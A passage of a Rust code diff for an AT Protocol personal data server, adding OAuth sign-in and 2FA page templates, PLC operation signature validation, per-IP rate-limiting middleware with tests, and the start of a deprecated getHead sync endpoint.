    text-overflow: ellipsis;
    white-space: nowrap;
}
.account-info .email {
    display: block;
    font-size: 0.875rem;
    color: var(--contrast-500);
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}
.chevron {
    color: var(--contrast-400);
    font-size: 1.25rem;
    flex-shrink: 0;
}
.divider {
    height: 1px;
    background: var(--contrast-100);
    margin: 1rem 0;
}
.link-button {
    background: none;
    border: none;
    color: var(--primary);
    cursor: pointer;
    font-size: inherit;
    padding: 0;
    text-decoration: underline;
}
.link-button:hover {
    color: var(--primary-hover);
}
.new-account-link {
    display: block;
    text-align: center;
    color: var(--primary);
    text-decoration: none;
    font-size: 0.875rem;
}
.new-account-link:hover {
    text-decoration: underline;
}
.help-text {
    text-align: center;
    margin-top: 1rem;
    font-size: 0.875rem;
    color: var(--contrast-500);
}
.icon {
    font-size: 3rem;
    margin-bottom: 1rem;
}
.error-code {
    background: var(--error-bg);
    color: var(--error);
    padding: 0.5rem 1rem;
    border-radius: 0.375rem;
    font-family: monospace;
    display: inline-block;
    margin-bottom: 1rem;
}
.success-icon {
    width: 3rem;
    height: 3rem;
    border-radius: 50%;
    background: var(--success-bg);
    color: var(--success);
    display: flex;
    align-items: center;
    justify-content: center;
    font-size: 1.5rem;
    margin: 0 auto 1rem;
}
.text-center {
    text-align: center;
}
.code-input {
    letter-spacing: 0.5em;
    text-align: center;
    font-size: 1.5rem;
    font-family: monospace;
}
"#
}
/// Render the OAuth sign-in page for a pending authorization request.
///
/// * `client_id` / `client_name` — requesting app; display falls back to
///   the raw client_id when no name is registered.
/// * `scope` — shown verbatim as a plain-language permission line
///   ("wants to …"); falls back to "access your account".
/// * `request_uri` — round-trips the pending request through the form as a
///   hidden field.
/// * `error_message` — when set, the form is re-rendered with an error
///   banner (e.g. after a failed login attempt).
/// * `login_hint` — pre-fills the username field.
///
/// All interpolated values are HTML-escaped before insertion.
pub fn login_page(
    client_id: &str,
    client_name: Option<&str>,
    scope: Option<&str>,
    request_uri: &str,
    error_message: Option<&str>,
    login_hint: Option<&str>,
) -> String {
    let client_display = client_name.unwrap_or(client_id);
    let scope_display = scope.unwrap_or("access your account");
    // Optional banner; empty string when there is no error to show.
    let error_html = error_message
        .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
        .unwrap_or_default();
    let login_hint_value = login_hint.unwrap_or("");
    format!(
        r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Sign in</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>Sign in</h1>
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
<div class="client-info">
<span class="client-name">{client_display}</span>
<span class="scope">wants to {scope_display}</span>
</div>
{error_html}
<form method="POST" action="/oauth/authorize">
<input type="hidden" name="request_uri" value="{request_uri}">
<div class="form-group">
<label for="username">Handle or Email</label>
<input type="text" id="username" name="username" value="{login_hint_value}"
required autocomplete="username" autofocus
placeholder="you@example.com">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required
autocomplete="current-password" placeholder="Enter your password">
</div>
<div class="checkbox-group">
<input type="checkbox" id="remember_device" name="remember_device" value="true">
<label for="remember_device">Remember this device</label>
</div>
<div class="buttons">
<button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button>
<button type="submit" class="btn btn-primary">Sign in</button>
</div>
</form>
<div class="footer">
By signing in, you agree to share your account information with this application.
</div>
</div>
</div>
</body>
</html>"#,
        styles = base_styles(),
        client_display = html_escape(client_display),
        scope_display = html_escape(scope_display),
        request_uri = html_escape(request_uri),
        error_html = error_html,
        login_hint_value = html_escape(login_hint_value),
    )
}
/// An account previously signed in on this device, as listed on the
/// account-selector page.
pub struct DeviceAccount {
    /// Account DID; posted back when the user picks this account.
    pub did: String,
    /// Handle, rendered with a leading `@` by the selector template.
    pub handle: String,
    /// Account email shown under the handle (callers may pass it masked).
    pub email: String,
    /// When this account last signed in from this device.
    pub last_used_at: DateTime<Utc>,
}
/// Render the "choose an account" page listing accounts remembered on this
/// device.
///
/// Each account is its own single-button POST form (so selection is one
/// click and the DID travels in the form body, not the URL). The
/// "Sign in with another account" link re-enters the login flow with
/// `new_account=true`. All interpolated values are HTML-escaped; the
/// `request_uri` in the link href is additionally percent-encoded.
pub fn account_selector_page(
    client_id: &str,
    client_name: Option<&str>,
    request_uri: &str,
    accounts: &[DeviceAccount],
) -> String {
    let client_display = client_name.unwrap_or(client_id);
    // One <form> per account; concatenated into the page body below.
    let accounts_html: String = accounts
        .iter()
        .map(|account| {
            let initials = get_initials(&account.handle);
            format!(
                r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
<input type="hidden" name="request_uri" value="{request_uri}">
<input type="hidden" name="did" value="{did}">
<button type="submit" class="account-item">
<div class="avatar">{initials}</div>
<div class="account-info">
<span class="handle">@{handle}</span>
<span class="email">{email}</span>
</div>
<span class="chevron"></span>
</button>
</form>"#,
                request_uri = html_escape(request_uri),
                did = html_escape(&account.did),
                initials = html_escape(&initials),
                handle = html_escape(&account.handle),
                email = html_escape(&account.email),
            )
        })
        .collect();
    format!(
        r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Choose an account</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>Choose an account</h1>
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
<div class="accounts">
{accounts_html}
</div>
<div class="divider"></div>
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
Sign in with another account
</a>
</div>
</div>
</body>
</html>"#,
        styles = base_styles(),
        client_display = html_escape(client_display),
        accounts_html = accounts_html,
        request_uri_encoded = urlencoding::encode(request_uri),
    )
}
/// Render the 2FA code-entry page, with wording tailored to the channel
/// the code was sent over.
///
/// * `request_uri` — round-trips the pending authorization request through
///   the form as a hidden field.
/// * `channel` — notification channel name; matched case-insensitively so
///   both the DB enum values ("email", "discord", "telegram", "signal")
///   and display-cased names ("Discord", …) select the right copy.
///   Unknown channels fall back to generic wording.
/// * `error_message` — when set, re-renders the form with an error banner.
///
/// Fix: the match previously used lowercase "email" but capitalized
/// "Discord"/"Telegram"/"Signal", so the three non-email arms could never
/// match the lowercase `notification_channel` enum values stored in the DB.
pub fn two_factor_page(
    request_uri: &str,
    channel: &str,
    error_message: Option<&str>,
) -> String {
    let error_html = error_message
        .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
        .unwrap_or_default();
    // Normalize before matching so casing differences between the DB enum
    // and display names can't silently select the generic fallback copy.
    let (title, subtitle) = match channel.to_ascii_lowercase().as_str() {
        "email" => ("Check your email", "We sent a verification code to your email"),
        "discord" => ("Check Discord", "We sent a verification code to your Discord"),
        "telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
        "signal" => ("Check Signal", "We sent a verification code to your Signal"),
        _ => ("Check your messages", "We sent you a verification code"),
    };
    format!(
        r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Verify your identity</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>{title}</h1>
<p class="subtitle">{subtitle}</p>
{error_html}
<form method="POST" action="/oauth/authorize/2fa">
<input type="hidden" name="request_uri" value="{request_uri}">
<div class="form-group">
<label for="code">Verification code</label>
<input type="text" id="code" name="code" class="code-input"
placeholder="000000"
pattern="[0-9]{{6}}" maxlength="6"
inputmode="numeric" autocomplete="one-time-code"
autofocus required>
</div>
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
</form>
<p class="help-text">
Code expires in 10 minutes.
</p>
</div>
</div>
</body>
</html>"#,
        styles = base_styles(),
        title = title,
        subtitle = subtitle,
        request_uri = html_escape(request_uri),
        error_html = error_html,
    )
}
/// Render a terminal OAuth error page (shown when the flow cannot continue
/// and there is no valid redirect URI to send the error back to).
///
/// `error` is displayed as a monospace error code; `error_description`
/// falls back to generic copy when absent. Both are HTML-escaped.
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
    let description = error_description.unwrap_or("An error occurred during the authorization process.");
    format!(
        r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Authorization Error</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card text-center">
<div class="icon">⚠️</div>
<h1>Authorization Failed</h1>
<div class="error-code">{error}</div>
<p class="subtitle" style="margin-bottom:0">{description}</p>
<div style="margin-top:1.5rem">
<button onclick="window.close()" class="btn btn-secondary">Close this window</button>
</div>
</div>
</div>
</body>
</html>"#,
        styles = base_styles(),
        error = html_escape(error),
        description = html_escape(description),
    )
}
/// Render the post-authorization success page telling the user they can
/// return to the application. `client_name` falls back to "The application"
/// when the client has no registered display name; it is HTML-escaped.
pub fn success_page(client_name: Option<&str>) -> String {
    let client_display = client_name.unwrap_or("The application");
    format!(
        r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Authorization Successful</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card text-center">
<div class="success-icon">✓</div>
<h1 style="color:var(--success)">Authorization Successful</h1>
<p class="subtitle">{client_display} has been granted access to your account.</p>
<p class="help-text">You can close this window and return to the application.</p>
</div>
</div>
</body>
</html>"#,
        styles = base_styles(),
        client_display = html_escape(client_display),
    )
}
/// Escape the five HTML-significant characters (`& < > " '`) so a value is
/// safe to interpolate into element bodies and quoted attribute values.
fn html_escape(s: &str) -> String {
    let mut escaped = String::with_capacity(s.len());
    for ch in s.chars() {
        match ch {
            '&' => escaped.push_str("&amp;"),
            '<' => escaped.push_str("&lt;"),
            '>' => escaped.push_str("&gt;"),
            '"' => escaped.push_str("&quot;"),
            '\'' => escaped.push_str("&#39;"),
            other => escaped.push(other),
        }
    }
    escaped
}
/// Avatar initial for an account: the uppercased first character of the
/// handle (ignoring a leading `@`), or `"?"` when there is nothing to show.
fn get_initials(handle: &str) -> String {
    let stripped = handle.trim_start_matches('@');
    match stripped.chars().next() {
        // `char::to_uppercase` may expand to multiple chars (e.g. 'ß' → "SS").
        Some(first) => first.to_uppercase().collect(),
        None => "?".to_string(),
    }
}
/// Partially mask an email for display: keeps the first (and, for longer
/// local parts, last) character of the local part plus the full domain,
/// e.g. `alice@x.com` → `a***e@x.com`. A string with no `@` becomes `***`.
pub fn mask_email(email: &str) -> String {
    let Some(at_pos) = email.find('@') else {
        return "***".to_string();
    };
    // `domain` keeps the leading '@' so it can be appended verbatim.
    let (local, domain) = email.split_at(at_pos);
    let head = local.chars().next().unwrap_or('*');
    if local.len() <= 2 {
        format!("{}***{}", head, domain)
    } else {
        let tail = local.chars().last().unwrap_or('*');
        format!("{}***{}{}", head, tail, domain)
    }
}

View File

@@ -319,6 +319,164 @@ pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
Ok(())
}
/// Server-side expectations a client-submitted PLC operation must satisfy
/// before this PDS forwards it to the PLC directory.
pub struct PlcValidationContext {
    /// did:key that must remain in the operation's `rotationKeys` so the
    /// server keeps recovery authority over the identity.
    pub server_rotation_key: String,
    /// did:key expected as the `atproto` verification method (signing key).
    pub expected_signing_key: String,
    /// Account handle expected in `alsoKnownAs` (as `at://<handle>`).
    pub expected_handle: String,
    /// Endpoint URL expected on the `atproto_pds` service entry.
    pub expected_pds_endpoint: String,
}
/// Validate a client-submitted PLC operation against this server's
/// expectations before it is forwarded to the PLC directory.
///
/// Runs the generic structural checks first; then, for `type ==
/// "plc_operation"` documents only (other types, e.g. tombstones, pass
/// through after the structural checks), verifies that:
/// - `rotationKeys` still contains this server's rotation key,
/// - the `atproto` verification method — if present — matches our signing key,
/// - `alsoKnownAs` — if non-empty — includes `at://<expected_handle>`,
/// - the `atproto_pds` service entry — if present — has the expected type
///   and endpoint.
///
/// NOTE(review): the signing-key and pds-service checks are skipped when
/// the corresponding entry is absent, and an empty `alsoKnownAs` passes —
/// confirm this leniency is intentional rather than requiring presence.
///
/// # Errors
/// Returns `PlcError::InvalidResponse` describing the first failed check.
pub fn validate_plc_operation_for_submission(
    op: &Value,
    ctx: &PlcValidationContext,
) -> Result<(), PlcError> {
    // Generic shape/signature-field checks shared with fetched operations.
    validate_plc_operation(op)?;
    let obj = op.as_object()
        .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
    let op_type = obj.get("type")
        .and_then(|v| v.as_str())
        .unwrap_or("");
    // Only full plc_operation documents carry the fields checked below.
    if op_type != "plc_operation" {
        return Ok(());
    }
    let rotation_keys = obj.get("rotationKeys")
        .and_then(|v| v.as_array())
        .ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
    let rotation_key_strings: Vec<&str> = rotation_keys
        .iter()
        .filter_map(|v| v.as_str())
        .collect();
    // Refuse operations that would rotate the server's recovery key out.
    if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
        return Err(PlcError::InvalidResponse(
            "Rotation keys do not include server's rotation key".to_string()
        ));
    }
    let verification_methods = obj.get("verificationMethods")
        .and_then(|v| v.as_object())
        .ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
    // Checked only when an `atproto` key is declared at all.
    if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
        if atproto_key != ctx.expected_signing_key {
            return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
        }
    }
    let also_known_as = obj.get("alsoKnownAs")
        .and_then(|v| v.as_array())
        .ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
    let expected_handle_uri = format!("at://{}", ctx.expected_handle);
    let has_correct_handle = also_known_as
        .iter()
        .filter_map(|v| v.as_str())
        .any(|s| s == expected_handle_uri);
    // An empty alsoKnownAs list is accepted; a non-empty list must include
    // the handle this server knows for the account.
    if !has_correct_handle && !also_known_as.is_empty() {
        return Err(PlcError::InvalidResponse(
            "Incorrect handle in alsoKnownAs".to_string()
        ));
    }
    let services = obj.get("services")
        .and_then(|v| v.as_object())
        .ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
    // Checked only when an atproto_pds service entry is declared.
    if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
        let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
        if service_type != "AtprotoPersonalDataServer" {
            return Err(PlcError::InvalidResponse(
                "Incorrect type on atproto_pds service".to_string()
            ));
        }
        let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
        if endpoint != ctx.expected_pds_endpoint {
            return Err(PlcError::InvalidResponse(
                "Incorrect endpoint on atproto_pds service".to_string()
            ));
        }
    }
    Ok(())
}
/// Check a PLC operation's `sig` against a set of rotation keys.
///
/// The signature is base64url (unpadded) over the DAG-CBOR encoding of the
/// operation with the `sig` field removed. Returns `Ok(true)` when any of
/// the supplied `did:key` rotation keys verifies the signature, `Ok(false)`
/// when none do, and `Err` only for malformed input (bad encoding or
/// signature bytes).
pub fn verify_operation_signature(
    op: &Value,
    rotation_keys: &[String],
) -> Result<bool, PlcError> {
    let obj = op.as_object()
        .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
    let sig_b64 = obj.get("sig")
        .and_then(|v| v.as_str())
        .ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
    let sig_bytes = URL_SAFE_NO_PAD
        .decode(sig_b64)
        .map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?;
    let signature = Signature::from_slice(&sig_bytes)
        .map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?;
    // Rebuild the signed message: the operation minus its `sig` field,
    // serialized as DAG-CBOR.
    let mut unsigned_op = op.clone();
    if let Some(unsigned_obj) = unsigned_op.as_object_mut() {
        unsigned_obj.remove("sig");
    }
    let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op)
        .map_err(|e| PlcError::Serialization(e.to_string()))?;
    // Any rotation key may have produced the signature; per-key failures
    // (including unsupported key types) are treated as non-matches.
    for key_did in rotation_keys {
        if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) {
            return Ok(true);
        }
    }
    Ok(false)
}
/// Verify an ECDSA signature over `message` with the public key embedded in
/// a `did:key` identifier. Only secp256k1 keys (multicodec prefix
/// `0xe7 0x01`) are supported.
///
/// Returns `Ok(false)` when the key parses but the signature does not
/// verify; `Err` when the did:key itself is malformed or unsupported.
///
/// Fix: removed the dead `(codec, key_bytes)` tuple and the unreachable
/// `if codec != 0xe701` branch — `codec` could only ever be `0xe701` on
/// that path, so the second check never fired.
fn verify_signature_with_did_key(
    did_key: &str,
    message: &[u8],
    signature: &Signature,
) -> Result<bool, PlcError> {
    use k256::ecdsa::{VerifyingKey, signature::Verifier};
    if !did_key.starts_with("did:key:z") {
        return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
    }
    // Skip "did:key:" (8 bytes) but keep the multibase prefix char ('z' =
    // base58btc), which multibase::decode needs to pick the alphabet.
    let multibase_part = &did_key[8..];
    let (_, decoded) = multibase::decode(multibase_part)
        .map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
    if decoded.len() < 2 {
        return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
    }
    // Require the secp256k1 multicodec varint prefix (0xe7 0x01).
    if decoded[0] != 0xe7 || decoded[1] != 0x01 {
        return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
    }
    let key_bytes = &decoded[2..];
    let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
        .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
    Ok(verifying_key.verify(message, signature).is_ok())
}
#[cfg(test)]
mod tests {
use super::*;

216
src/rate_limit.rs Normal file
View File

@@ -0,0 +1,216 @@
use axum::{
body::Body,
extract::ConnectInfo,
http::{HeaderMap, Request, StatusCode},
middleware::Next,
response::{IntoResponse, Response},
Json,
};
use governor::{
Quota, RateLimiter,
clock::DefaultClock,
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
};
use std::{
net::SocketAddr,
num::NonZeroU32,
sync::Arc,
};
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
/// Per-endpoint keyed rate limiters shared across the app. Cloning is
/// cheap: each limiter sits behind an `Arc`, so clones share state.
/// Keys are caller-chosen strings — the middleware in this module keys
/// by client IP.
#[derive(Clone)]
pub struct RateLimiters {
    /// Login attempts (default quota: 10/minute per key).
    pub login: Arc<KeyedRateLimiter>,
    /// OAuth token endpoint requests (default quota: 30/minute per key).
    pub oauth_token: Arc<KeyedRateLimiter>,
    /// Password reset requests (default quota: 5/hour per key).
    pub password_reset: Arc<KeyedRateLimiter>,
    /// Account creation requests (default quota: 10/hour per key).
    pub account_creation: Arc<KeyedRateLimiter>,
}
/// `Default` delegates to `new()`, i.e. the built-in production quotas.
impl Default for RateLimiters {
    fn default() -> Self {
        Self::new()
    }
}
impl RateLimiters {
    /// Construct with the default quotas: 10 logins/min, 30 OAuth token
    /// requests/min, 5 password resets/hour, 10 account creations/hour —
    /// all tracked independently per key.
    ///
    /// The `NonZeroU32::new(..).unwrap()` calls cannot panic: the literals
    /// are all non-zero.
    pub fn new() -> Self {
        Self {
            login: Arc::new(RateLimiter::keyed(
                Quota::per_minute(NonZeroU32::new(10).unwrap())
            )),
            oauth_token: Arc::new(RateLimiter::keyed(
                Quota::per_minute(NonZeroU32::new(30).unwrap())
            )),
            password_reset: Arc::new(RateLimiter::keyed(
                Quota::per_hour(NonZeroU32::new(5).unwrap())
            )),
            account_creation: Arc::new(RateLimiter::keyed(
                Quota::per_hour(NonZeroU32::new(10).unwrap())
            )),
        }
    }

    /// Override the login quota (requests per minute). Passing 0 silently
    /// falls back to the default of 10 (`NonZeroU32::new(0)` is `None`).
    pub fn with_login_limit(mut self, per_minute: u32) -> Self {
        self.login = Arc::new(RateLimiter::keyed(
            Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
        ));
        self
    }

    /// Override the OAuth token quota (requests per minute). Passing 0
    /// silently falls back to the default of 30.
    pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
        self.oauth_token = Arc::new(RateLimiter::keyed(
            Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
        ));
        self
    }

    /// Override the password reset quota (requests per hour). Passing 0
    /// silently falls back to the default of 5.
    pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
        self.password_reset = Arc::new(RateLimiter::keyed(
            Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
        ));
        self
    }

    /// Override the account creation quota (requests per hour). Passing 0
    /// silently falls back to the default of 10.
    pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
        self.account_creation = Arc::new(RateLimiter::keyed(
            Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
        ));
        self
    }
}
/// Best-effort client IP for rate-limit keying: `X-Forwarded-For` (first
/// hop), then `X-Real-IP`, then the socket peer address, then `"unknown"`.
///
/// NOTE(review): the two headers are client-supplied unless a trusted
/// reverse proxy overwrites them — confirm the deployment does so before
/// trusting them over the socket address.
fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
    let from_headers = headers
        .get("x-forwarded-for")
        .and_then(|value| value.to_str().ok())
        .and_then(|value| value.split(',').next())
        .map(|ip| ip.trim().to_string())
        .or_else(|| {
            headers
                .get("x-real-ip")
                .and_then(|value| value.to_str().ok())
                .map(|value| value.trim().to_string())
        });
    match from_headers {
        Some(ip) => ip,
        None => addr
            .map(|a| a.ip().to_string())
            .unwrap_or_else(|| "unknown".to_string()),
    }
}
/// Canonical 429 response body shared by all rate-limit middleware.
fn rate_limit_response() -> Response {
    let body = serde_json::json!({
        "error": "RateLimitExceeded",
        "message": "Too many requests. Please try again later."
    });
    (StatusCode::TOO_MANY_REQUESTS, Json(body)).into_response()
}
/// Axum middleware: per-client-IP rate limit for login attempts.
/// Short-circuits with a 429 JSON response when the quota is exhausted;
/// otherwise forwards the request unchanged.
pub async fn login_rate_limit(
    ConnectInfo(addr): ConnectInfo<SocketAddr>,
    axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
    request: Request<Body>,
    next: Next,
) -> Response {
    let client_ip = extract_client_ip(request.headers(), Some(addr));
    if limiters.login.check_key(&client_ip).is_err() {
        tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
        return rate_limit_response();
    }
    next.run(request).await
}
/// Axum middleware: per-client-IP rate limit for the OAuth token endpoint.
/// Short-circuits with a 429 JSON response when the quota is exhausted.
pub async fn oauth_token_rate_limit(
    ConnectInfo(addr): ConnectInfo<SocketAddr>,
    axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
    request: Request<Body>,
    next: Next,
) -> Response {
    let client_ip = extract_client_ip(request.headers(), Some(addr));
    if limiters.oauth_token.check_key(&client_ip).is_err() {
        tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
        return rate_limit_response();
    }
    next.run(request).await
}
/// Axum middleware: per-client-IP rate limit for password reset requests.
/// Short-circuits with a 429 JSON response when the quota is exhausted.
pub async fn password_reset_rate_limit(
    ConnectInfo(addr): ConnectInfo<SocketAddr>,
    axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
    request: Request<Body>,
    next: Next,
) -> Response {
    let client_ip = extract_client_ip(request.headers(), Some(addr));
    if limiters.password_reset.check_key(&client_ip).is_err() {
        tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
        return rate_limit_response();
    }
    next.run(request).await
}
/// Axum middleware: per-client-IP rate limit for account creation.
/// Short-circuits with a 429 JSON response when the quota is exhausted.
pub async fn account_creation_rate_limit(
    ConnectInfo(addr): ConnectInfo<SocketAddr>,
    axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
    request: Request<Body>,
    next: Next,
) -> Response {
    let client_ip = extract_client_ip(request.headers(), Some(addr));
    if limiters.account_creation.check_key(&client_ip).is_err() {
        tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
        return rate_limit_response();
    }
    next.run(request).await
}
#[cfg(test)]
mod tests {
    use super::*;

    /// A fresh key on the default limiters is allowed its first request.
    #[test]
    fn test_rate_limiters_creation() {
        let limiters = RateLimiters::new();
        assert!(limiters.login.check_key(&"test".to_string()).is_ok());
    }

    /// A 2/minute quota admits exactly two requests for the same key.
    #[test]
    fn test_rate_limiter_exhaustion() {
        let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
        let key = "test_ip".to_string();
        assert!(limiter.check_key(&key).is_ok());
        assert!(limiter.check_key(&key).is_ok());
        assert!(limiter.check_key(&key).is_err());
    }

    /// Quotas are tracked independently per key: exhausting one key does
    /// not affect another.
    #[test]
    fn test_different_keys_have_separate_limits() {
        let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
        assert!(limiter.check_key(&"ip1".to_string()).is_ok());
        assert!(limiter.check_key(&"ip1".to_string()).is_err());
        assert!(limiter.check_key(&"ip2".to_string()).is_ok());
    }

    /// The with_* builder methods chain and still yield working limiters.
    #[test]
    fn test_builder_pattern() {
        let limiters = RateLimiters::new()
            .with_login_limit(20)
            .with_oauth_token_limit(60)
            .with_password_reset_limit(3)
            .with_account_creation_limit(5);
        assert!(limiters.login.check_key(&"test".to_string()).is_ok());
    }
}

View File

@@ -1,4 +1,6 @@
use crate::circuit_breaker::CircuitBreakers;
use crate::config::AuthConfig;
use crate::rate_limit::RateLimiters;
use crate::repo::PostgresBlockStore;
use crate::storage::{BlobStorage, S3BlobStorage};
use crate::sync::firehose::SequencedEvent;
@@ -12,6 +14,8 @@ pub struct AppState {
pub block_store: PostgresBlockStore,
pub blob_store: Arc<dyn BlobStorage>,
pub firehose_tx: broadcast::Sender<SequencedEvent>,
pub rate_limiters: Arc<RateLimiters>,
pub circuit_breakers: Arc<CircuitBreakers>,
}
impl AppState {
@@ -21,11 +25,25 @@ impl AppState {
let block_store = PostgresBlockStore::new(db.clone());
let blob_store = S3BlobStorage::new().await;
let (firehose_tx, _) = broadcast::channel(1000);
let rate_limiters = Arc::new(RateLimiters::new());
let circuit_breakers = Arc::new(CircuitBreakers::new());
Self {
db,
block_store,
blob_store: Arc::new(blob_store),
firehose_tx,
rate_limiters,
circuit_breakers,
}
}
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
self.rate_limiters = Arc::new(rate_limiters);
self
}
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
self.circuit_breakers = Arc::new(circuit_breakers);
self
}
}

View File

@@ -19,8 +19,6 @@ pub async fn notify_of_update(
Query(params): Query<NotifyOfUpdateParams>,
) -> Response {
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
info!("TODO: Queue job for notifyOfUpdate (not implemented)");
(StatusCode::OK, Json(json!({}))).into_response()
}
@@ -34,7 +32,5 @@ pub async fn request_crawl(
Json(input): Json<RequestCrawlInput>,
) -> Response {
info!("Received requestCrawl for hostname: {}", input.hostname);
info!("TODO: Queue job for requestCrawl (not implemented)");
(StatusCode::OK, Json(json!({}))).into_response()
}

209
src/sync/deprecated.rs Normal file
View File

@@ -0,0 +1,209 @@
use crate::state::AppState;
use crate::sync::car::encode_car_header;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use cid::Cid;
use ipld_core::ipld::Ipld;
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::json;
use std::io::Write;
use std::str::FromStr;
use tracing::error;
// Cap on how many blocks get_checkout will walk when streaming a repo —
// a denial-of-service guard; repos over the cap yield a truncated CAR.
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;

/// Query parameters for the deprecated `com.atproto.sync.getHead` endpoint.
#[derive(Deserialize)]
pub struct GetHeadParams {
    /// DID whose repo head is requested.
    pub did: String,
}

/// Response body for getHead: the repo's current root commit CID.
#[derive(Serialize)]
pub struct GetHeadOutput {
    pub root: String,
}
/// Handler for the deprecated `com.atproto.sync.getHead` XRPC endpoint.
///
/// Resolves the current repo root CID for a DID. Responds 400
/// `HeadNotFound` when the DID has no repo row (error name per the
/// lexicon), and 500 on database failure.
pub async fn get_head(
    State(state): State<AppState>,
    Query(params): Query<GetHeadParams>,
) -> Response {
    let did = params.did.trim();
    // Reject blank DIDs up front rather than querying with an empty key.
    if did.is_empty() {
        return (
            StatusCode::BAD_REQUEST,
            Json(json!({"error": "InvalidRequest", "message": "did is required"})),
        )
            .into_response();
    }
    let result = sqlx::query!(
        r#"
        SELECT r.repo_root_cid
        FROM repos r
        JOIN users u ON r.user_id = u.id
        WHERE u.did = $1
        "#,
        did
    )
    .fetch_optional(&state.db)
    .await;
    match result {
        // Stored root CID is returned verbatim.
        Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
        Ok(None) => (
            StatusCode::BAD_REQUEST,
